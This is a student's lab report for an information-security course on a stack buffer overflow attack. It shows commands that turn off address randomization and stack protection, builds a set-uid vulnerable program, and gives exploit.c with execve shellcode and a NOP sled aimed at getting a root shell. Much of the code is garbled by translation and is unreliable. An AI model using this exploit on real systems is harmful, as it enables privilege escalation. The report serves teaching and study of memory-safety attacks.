Experiment Introduction:
Buffer overflow attack: by writing to the program's buffer beyond its length content, causing buffer overflow, thereby destroying the program's stack, causing the program to crash or to make the program to execute other instructions to achieve the purpose of the attack.
Experimental principle:
In general, a buffer overflow can cause a program to crash, and in the program, the overflow data overwrites the return address. And if the data that overwrites the return address is another address, then the program jumps to that address, and if the address is a piece of well-designed code to implement other functions, this code is shellcode. Shellcode is the assembly code that holds the program.
Experimental steps:
1. Turn off the address space randomization feature, making it easier to guess the initial address of the random heap (heap) and stacks (stack).
Use the command:
sudo sysctl -w kernel.randomize_va_space=0
2. Use another shell program (zsh) instead of/bin/bash to reproduce the situation before a buffer overflow attack and other attack protection measures using the shell program are implemented.
To set the ZSH program command:
$ sudo su
$ cd /bin
$ rm sh
$ ln -s zsh sh
$ exit
3, enter the LINUX32 bit environment, input "/bin/bash" use bash
$ linux32
$/bin/bash
4, create a new stack.c file in the/tmp directory, code
5, code to know, The program reads a file named "Badfile" and loads the contents of the file into "buffer". Compile the program, and set the Set-uid. The command is as follows:
$ sudo su
$ gcc-m32-g-Z execstack-fno-stack-protector-o stack stack.c
$ chmod u+s Stack
$ exit
The GCC compiler has a stack protection mechanism to prevent buffer overflows, so we need to compile the code with – Fno-stack-protector
to close this mechanism. -Z execstack
is used to allow the execution of the stack. The -G
parameter is used to debug a compiled executable document with GDB.
6. Create a new exploit.c file in the/tmp directory with the following code:
/* EXPLOIT.C *//* A program this creates a file containing code for launching shell*/#include <stdlib.h> #include & lt;stdio.h> #include <string.h>char shellcode[] = "\x31\xc0"//xorl%eax,%eax "\x50"//PUSHL%eax "\ x68 "//sh"//PUSHL $0x68732f2f "\x68" "/bin"//PUSHL $0x6e69622f "\x89\xe3"//movl%esp,%ebx "\x50"//push L%eax "\x53"//PUSHL%ebx "\x89\xe1"//movl%esp,%ecx "\x99"//CDQ "\xb0\x0b"//movb $0x0b,%al "\x cd\x80 "//int $0x80; void Main (int argc, char **argv) {char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */memset (&buffer, 0x90, 517); /* need to fill the buffer with appropriate contents here */strcpy (buffer, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x?? \x?? \x?? \x?? "); Four bytes starting at a specific offset of buffer overwrite Sellcode address strcpy (buffer + shellcode); Copy the shellcode to buffer with offset set to/* Save the Contents to the file "badfile" */Badfile = fopen ("./badfile", "w"); fwrite (buffer, 517, 1, badfile); Fclose (badfile);}
Note The above code, \x??\x??\x??\x??
where you need to add an address that shellcode in memory, because this location can overwrite the return address exactly after an overflow occurs. And strcpy(buffer+100,shellcode);
This sentence tells us again, Shellcode is saved in buffer + 100
the position. Below we will detail how to get the address we need to add.
Now we're going to get shellcode in memory address
Enter the command:
$ gdb stack
$ disass main
Next:
7, according to the statement strcpy (buffer + 100,shellcode); We calculate Shellcode's address as 0xffffd2d0 (hex) + 0x64 (hex of 100) = 0xffffd334 (hex)
Modify EXPLOIT.C file Now! Will \x?? \x?? \x?? \x?? Make changes
Then, compile the EXPLOIT.C program:$ gcc -m32 -o exploit exploit.c
Then run the attack program exploit, then run the vulnerability program stack and observe the results:
# # #练习题:
1, through the command sudo sysctl-w kernel.randomize_va_space=2 open the system's address space randomization mechanism, repeated use of exploit program to attack the stack program, to observe whether the attack succeeds, can gain root authority.
2, the/bin/sh to/bin/bash (or/bin/dash), to observe whether the attack succeeds, can gain root privileges.
Problems encountered in the practice:
An error occurred while calculating hex, and after re-using GDB disassembly, the correct results were recalculated.
2018-2019-1 20165323 "Information Security system Design Fundamentals" Buffer Overflow Vulnerability Experiment Report